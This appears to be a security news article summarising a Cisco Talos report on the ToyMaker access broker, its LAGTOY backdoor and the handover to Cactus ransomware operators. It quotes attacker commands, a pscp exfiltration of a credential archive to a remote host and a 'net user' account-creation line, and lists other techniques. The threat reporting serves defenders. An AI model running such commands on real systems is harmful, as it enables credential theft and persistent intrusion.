Ddos 
Image: Cisco Talos
Cisco Talos’ 2023 incident response report unveils the operations of “ToyMaker,” a financially motivated Initial Access Broker (IAB) whose behind-the-scenes activity opened the floodgates to a full-scale ransomware assault led by the infamous Cactus group.
The campaign began when Cisco Talos discovered that ToyMaker had exploited vulnerable, internet-facing systems to gain initial access. Using a custom backdoor called LAGTOY, ToyMaker moved stealthily through the compromised infrastructure:
“The initial access broker (IAB), whom Talos calls ‘ToyMaker’… deploys their custom-made backdoor we call ‘LAGTOY’ and extracts credentials from the victim enterprise.”
LAGTOY is a reverse shell implant with a raw-socket-based C2 connection over port 443 — deceptively not using TLS. Its purpose is straightforward: execute attacker commands, avoid detection, and persist as a Windows service under the name WmiPrvSV.
“LAGTOY is a simple yet effective implant… periodically reaches out to the hard-coded C2 server and accepts commands.”
Talos’ analysis highlighted the malware’s anti-debugging measures and time-based execution logic, designed to avoid scrutiny and optimize dwell time.
Credential harvesting was a key focus. Using tools like Magnet RAM Capture and PuTTY’s SCP utility, ToyMaker extracted credentials from memory dumps and exfiltrated them off-site: pscp.exe-P 53 1.7z root@<Remote_IP>:/root.
This was followed by three weeks of apparent inactivity, reinforcing the idea that ToyMaker’s business model stops at access acquisition:
“Based on the relatively short dwell time, the lack of data theft and the subsequent handover to Cactus, it is unlikely that ToyMaker had any espionage-motivated ambitions.”
Almost a month after the breach, the handoff occurred. Cactus ransomware operators picked up the credentials left behind and initiated their own assault, complete with:
- PowerShell remoting scans via WSMAN.
- Deployment of remote access tools like AnyDesk, eHorus, RMS, and OpenSSH.
- Mass data exfiltration using 7-Zip and curl.
- Account creation for persistence (e.g., net user whiteninja <password> /add).
- Volume shadow deletion and Safe Mode reboots to disable defenses.
“Cactus ransomware group takes its operational security seriously. They remove access to the file that contains the SSH private key…”
Notably, Cactus leveraged Metasploit-injected binaries and communicated over multiple ports, including 443, 8343, and 9232, showing advanced planning and resourceful use of open-source tools.
Talos stresses the need for updated threat modeling to capture compartmentalized but interconnected threats, such as IABs and ransomware gangs:
“The disparity in TTPs and timelines between the initial access conducted by ToyMaker and the secondary activity conducted by Cactus requires that both threats be modeled separately.”
This case illustrates how financially motivated actors are outsourcing phases of an attack to maximize efficiency and minimize risk — a growing trend in the ransomware ecosystem.
Related Posts:
- Cactus Ransomware Targets Qlik Sense Servers
- Cacti Network Monitoring Tool Patches Security Flaws, Including RCE Vulnerability
- Black Basta and Cactus Ransomware Groups Weaponize BackConnect Malware
- CVE-2025-22604 (CVSS 9.1): Remote Code Execution Flaw in Cacti, PoC Released
- Critical vulnerability affects Cacti network graphing solution
Donate